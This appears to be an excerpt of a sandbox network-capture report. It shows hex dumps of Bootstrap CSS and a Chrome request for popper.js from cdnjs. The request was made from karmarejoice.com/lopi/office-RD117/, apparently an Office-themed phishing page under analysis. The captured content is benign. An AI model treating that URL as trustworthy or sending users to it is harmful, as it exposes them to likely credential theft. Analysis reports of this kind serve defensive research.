                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC779INData Raw: 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 2e 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 73 6d 7b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 73 6d 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 73 6d 20 2e 6c 69 73 74 2d 67 72
                                                                                                                                                                                                                            Data Ascii: om-right-radius:.25rem;border-bottom-left-radius:0}@media (min-width:576px){.list-group-horizontal-sm{-ms-flex-direction:row;flex-direction:row}.list-group-horizontal-sm .list-group-item{margin-right:-1px;margin-bottom:0}.list-group-horizontal-sm .list-gr
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC783INData Raw: 31 38 32 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 64 66 64 66 65 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 6c 69 67 68 74 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 61 63 74 69 6f 6e 3a 66 6f 63 75 73 2c 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 6c 69 67 68 74 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 61 63 74 69 6f 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 38 31 38 31 38 32 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 63 65 63 66 36 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 6c 69 67 68 74 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2d 61 63 74 69 6f 6e 2e 61 63 74 69 76 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38
                                                                                                                                                                                                                            Data Ascii: 182;background-color:#fdfdfe}.list-group-item-light.list-group-item-action:focus,.list-group-item-light.list-group-item-action:hover{color:#818182;background-color:#ececf6}.list-group-item-light.list-group-item-action.active{color:#fff;background-color:#8
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC786INData Raw: 38 30 30 30 0d 0a 3a 6e 6f 6e 65 7d 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 61 75 74 6f 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33
                                                                                                                                                                                                                            Data Ascii: 8000:none}.modal-content{position:relative;display:-ms-flexbox;display:flex;-ms-flex-direction:column;flex-direction:column;width:100%;pointer-events:auto;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,.2);border-radius:.3
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC790INData Raw: 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 3b 77 6f 72 64 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 62 72 65 61 6b 3a 61 75 74 6f 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6c 69 70 3a 70 61 64 64 69 6e 67 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 72 65 6d 7d 2e 70 6f 70 6f 76 65
                                                                                                                                                                                                                            Data Ascii: nsform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;white-space:normal;line-break:auto;font-size:.875rem;word-wrap:break-word;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,.2);border-radius:.3rem}.popove
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC794INData Raw: 61 63 74 69 76 65 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 7b 7a 2d 69 6e 64 65 78 3a 30 3b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 30 73 20 2e 36 73 20 6f 70 61 63 69 74 79 7d 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 72 65 64 75 63 65 64 2d 6d 6f 74 69 6f 6e 3a 72 65 64 75 63 65 29 7b 2e 63 61 72 6f 75 73 65 6c 2d 66 61 64 65 20 2e 61 63 74 69 76 65 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 2c 2e 63 61 72 6f 75 73 65 6c 2d 66 61 64 65 20 2e 61 63 74 69 76 65 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 6e 6f 6e 65 7d 7d 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 6e 65 78 74 2c 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d
                                                                                                                                                                                                                            Data Ascii: active.carousel-item-right{z-index:0;opacity:0;transition:0s .6s opacity}@media (prefers-reduced-motion:reduce){.carousel-fade .active.carousel-item-left,.carousel-fade .active.carousel-item-right{transition:none}}.carousel-control-next,.carousel-control-
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC799INData Raw: 6f 76 65 72 2c 62 75 74 74 6f 6e 2e 62 67 2d 77 61 72 6e 69 6e 67 3a 66 6f 63 75 73 2c 62 75 74 74 6f 6e 2e 62 67 2d 77 61 72 6e 69 6e 67 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 33 39 65 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 67 2d 64 61 6e 67 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 63 33 35 34 35 21 69 6d 70 6f 72 74 61 6e 74 7d 61 2e 62 67 2d 64 61 6e 67 65 72 3a 66 6f 63 75 73 2c 61 2e 62 67 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 2c 62 75 74 74 6f 6e 2e 62 67 2d 64 61 6e 67 65 72 3a 66 6f 63 75 73 2c 62 75 74 74 6f 6e 2e 62 67 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 64 32 31 33 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 62 67 2d
                                                                                                                                                                                                                            Data Ascii: over,button.bg-warning:focus,button.bg-warning:hover{background-color:#d39e00!important}.bg-danger{background-color:#dc3545!important}a.bg-danger:focus,a.bg-danger:hover,button.bg-danger:focus,button.bg-danger:hover{background-color:#bd2130!important}.bg-
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC872INData Raw: 72 6f 77 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 72 6f 77 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 2d 78 6c 2d 74 61 62 6c 65 2d 63 65 6c 6c 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 2d 78 6c 2d 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 64 2d 78 6c 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 7b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 69 6e 6c 69 6e 65 2d 66 6c 65 78 62 6f 78 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 66 6c 65 78 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 2e 64 2d 70 72 69 6e 74 2d 6e 6f 6e 65 7b
                                                                                                                                                                                                                            Data Ascii: row{display:table-row!important}.d-xl-table-cell{display:table-cell!important}.d-xl-flex{display:-ms-flexbox!important;display:flex!important}.d-xl-inline-flex{display:-ms-inline-flexbox!important;display:inline-flex!important}}@media print{.d-print-none{
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC876INData Raw: 6d 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c 65 78 2d 73 6d 2d 72 6f 77 2d 72 65 76 65 72 73 65 7b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 2d 72 65 76 65 72 73 65 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 2d 72 65 76 65 72 73 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c 65 78 2d 73 6d 2d 63 6f 6c 75 6d 6e 2d 72 65 76 65 72 73 65 7b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 2d 72 65 76 65 72 73 65 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 2d 72 65 76 65 72 73 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c
                                                                                                                                                                                                                            Data Ascii: mn!important;flex-direction:column!important}.flex-sm-row-reverse{-ms-flex-direction:row-reverse!important;flex-direction:row-reverse!important}.flex-sm-column-reverse{-ms-flex-direction:column-reverse!important;flex-direction:column-reverse!important}.fl
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC881INData Raw: 74 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 61 72 6f 75 6e 64 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 6d 64 2d 73 74 61 72 74 7b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 6d 64 2d 65 6e 64 7b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 69 74 65 6d 73 2d 6d 64 2d 63 65 6e 74 65 72 7b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 21 69 6d 70
                                                                                                                                                                                                                            Data Ascii: t;justify-content:space-around!important}.align-items-md-start{-ms-flex-align:start!important;align-items:flex-start!important}.align-items-md-end{-ms-flex-align:end!important;align-items:flex-end!important}.align-items-md-center{-ms-flex-align:center!imp
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC885INData Raw: 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 73 65 6c 66 2d 6c 67 2d 63 65 6e 74 65 72 7b 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 63 65 6e 74 65 72 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 73 65 6c 66 2d 6c 67 2d 62 61 73 65 6c 69 6e 65 7b 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 62 61 73 65 6c 69 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 73 65 6c 66 2d 6c 67 2d 73 74 72 65 74 63 68 7b 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 73 74
                                                                                                                                                                                                                            Data Ascii: align-self:flex-end!important}.align-self-lg-center{-ms-flex-item-align:center!important;align-self:center!important}.align-self-lg-baseline{-ms-flex-item-align:baseline!important;align-self:baseline!important}.align-self-lg-stretch{-ms-flex-item-align:st
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC888INData Raw: 36 34 38 63 0d 0a 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 73 65 6c 66 2d 78 6c 2d 73 74 72 65 74 63 68 7b 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 73 74 72 65 74 63 68 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 73 74 72 65 74 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 66 6c 6f 61 74 2d 6c 65 66 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c 6f 61 74 2d 72 69 67 68 74 7b 66 6c 6f 61 74 3a 72 69 67 68 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 66 6c 6f 61 74 2d 6e 6f 6e 65 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 66 6c 6f 61 74 2d 73 6d 2d 6c 65 66 74 7b 66 6c 6f 61 74 3a 6c 65 66 74 21
                                                                                                                                                                                                                            Data Ascii: 648crtant}.align-self-xl-stretch{-ms-flex-item-align:stretch!important;align-self:stretch!important}}.float-left{float:left!important}.float-right{float:right!important}.float-none{float:none!important}@media (min-width:576px){.float-sm-left{float:left!
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC892INData Raw: 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 33 2c 2e 70 79 2d 33 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 6c 2d 33 2c 2e 70 78 2d 33 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 2d 34 7b 70 61 64 64 69 6e 67 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 74 2d 34 2c 2e 70 79 2d 34 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 72 2d 34 2c 2e 70 78 2d 34 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 34 2c 2e 70 79 2d 34 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74
                                                                                                                                                                                                                            Data Ascii: :1rem!important}.pb-3,.py-3{padding-bottom:1rem!important}.pl-3,.px-3{padding-left:1rem!important}.p-4{padding:1.5rem!important}.pt-4,.py-4{padding-top:1.5rem!important}.pr-4,.px-4{padding-right:1.5rem!important}.pb-4,.py-4{padding-bottom:1.5rem!important
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC896INData Raw: 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 62 2d 73 6d 2d 35 2c 2e 70 79 2d 73 6d 2d 35 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 70 6c 2d 73 6d 2d 35 2c 2e 70 78 2d 73 6d 2d 35 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 73 6d 2d 6e 31 7b 6d 61 72 67 69 6e 3a 2d 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 73 6d 2d 6e 31 2c 2e 6d 79 2d 73 6d 2d 6e 31 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72 2d 73 6d 2d 6e 31 2c 2e 6d 78 2d 73 6d 2d 6e 31 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 73 6d 2d 6e 31 2c 2e
                                                                                                                                                                                                                            Data Ascii: :3rem!important}.pb-sm-5,.py-sm-5{padding-bottom:3rem!important}.pl-sm-5,.px-sm-5{padding-left:3rem!important}.m-sm-n1{margin:-.25rem!important}.mt-sm-n1,.my-sm-n1{margin-top:-.25rem!important}.mr-sm-n1,.mx-sm-n1{margin-right:-.25rem!important}.mb-sm-n1,.
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC900INData Raw: 72 67 69 6e 2d 72 69 67 68 74 3a 2d 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 6d 64 2d 6e 31 2c 2e 6d 79 2d 6d 64 2d 6e 31 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 6c 2d 6d 64 2d 6e 31 2c 2e 6d 78 2d 6d 64 2d 6e 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 2e 32 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 6d 64 2d 6e 32 7b 6d 61 72 67 69 6e 3a 2d 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6d 64 2d 6e 32 2c 2e 6d 79 2d 6d 64 2d 6e 32 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72 2d 6d 64 2d 6e 32 2c 2e 6d 78 2d 6d 64 2d 6e 32 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 2e 35 72 65 6d 21 69 6d 70
                                                                                                                                                                                                                            Data Ascii: rgin-right:-.25rem!important}.mb-md-n1,.my-md-n1{margin-bottom:-.25rem!important}.ml-md-n1,.mx-md-n1{margin-left:-.25rem!important}.m-md-n2{margin:-.5rem!important}.mt-md-n2,.my-md-n2{margin-top:-.5rem!important}.mr-md-n2,.mx-md-n2{margin-right:-.5rem!imp
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC904INData Raw: 2d 6c 67 2d 6e 32 2c 2e 6d 78 2d 6c 67 2d 6e 32 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 6c 67 2d 6e 32 2c 2e 6d 79 2d 6c 67 2d 6e 32 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 6c 2d 6c 67 2d 6e 32 2c 2e 6d 78 2d 6c 67 2d 6e 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 6c 67 2d 6e 33 7b 6d 61 72 67 69 6e 3a 2d 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 6c 67 2d 6e 33 2c 2e 6d 79 2d 6c 67 2d 6e 33 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72 2d 6c 67 2d 6e 33 2c 2e 6d 78 2d 6c 67 2d 6e 33 7b 6d 61 72 67 69 6e 2d 72 69
                                                                                                                                                                                                                            Data Ascii: -lg-n2,.mx-lg-n2{margin-right:-.5rem!important}.mb-lg-n2,.my-lg-n2{margin-bottom:-.5rem!important}.ml-lg-n2,.mx-lg-n2{margin-left:-.5rem!important}.m-lg-n3{margin:-1rem!important}.mt-lg-n3,.my-lg-n3{margin-top:-1rem!important}.mr-lg-n3,.mx-lg-n3{margin-ri
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC908INData Raw: 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72 2d 78 6c 2d 6e 33 2c 2e 6d 78 2d 78 6c 2d 6e 33 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 62 2d 78 6c 2d 6e 33 2c 2e 6d 79 2d 78 6c 2d 6e 33 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 6c 2d 78 6c 2d 6e 33 2c 2e 6d 78 2d 78 6c 2d 6e 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 31 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 2d 78 6c 2d 6e 34 7b 6d 61 72 67 69 6e 3a 2d 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 74 2d 78 6c 2d 6e 34 2c 2e 6d 79 2d 78 6c 2d 6e 34 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 2e 35 72 65 6d 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6d 72 2d 78 6c 2d 6e 34 2c 2e 6d 78
                                                                                                                                                                                                                            Data Ascii: m!important}.mr-xl-n3,.mx-xl-n3{margin-right:-1rem!important}.mb-xl-n3,.my-xl-n3{margin-bottom:-1rem!important}.ml-xl-n3,.mx-xl-n3{margin-left:-1rem!important}.m-xl-n4{margin:-1.5rem!important}.mt-xl-n4,.my-xl-n4{margin-top:-1.5rem!important}.mr-xl-n4,.mx
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC913INData Raw: 65 3a 63 6f 6c 6c 61 70 73 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 61 62 6c 65 20 74 64 2c 2e 74 61 62 6c 65 20 74 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 20 74 64 2c 2e 74 61 62 6c 65 2d 62 6f 72 64 65 72 65 64 20 74 68 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 65 65 32 65 36 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 74 61 62 6c 65 2d 64 61 72 6b 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2e 74 61 62 6c 65 2d 64 61 72 6b 20 74 62 6f 64 79 2b 74 62 6f 64 79 2c 2e 74 61 62 6c 65 2d 64 61 72 6b 20 74 64 2c 2e 74 61 62 6c 65 2d 64 61 72 6b 20 74 68 2c 2e 74 61 62 6c 65 2d 64 61 72 6b 20 74 68 65 61 64 20 74 68 7b 62 6f 72 64 65 72 2d 63
                                                                                                                                                                                                                            Data Ascii: e:collapse!important}.table td,.table th{background-color:#fff!important}.table-bordered td,.table-bordered th{border:1px solid #dee2e6!important}.table-dark{color:inherit}.table-dark tbody+tbody,.table-dark td,.table-dark th,.table-dark thead th{border-c
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC913INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                            23192.168.2.649897104.17.24.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC689OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                                                                                                                            Host: cdnjs.cloudflare.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Origin: https://karmarejoice.com
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                            Referer: https://karmarejoice.com/lopi/office-RD117/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2022-05-13 18:46:54 UTC803INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Fri, 13 May 2022 18:46:54 GMT
                                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Cache-Control: public, max-age=30672000
                                                                                                                                                                                                                            ETag: W/"5eb03fa9-4af4"
                                                                                                                                                                                                                            Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                                                                                                                            cf-cdnjs-via: cfworker/kv
                                                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                            Age: 1365571
                                                                                                                                                                                                                            Expires: Wed, 03 May 2023 18:46:54 GMT
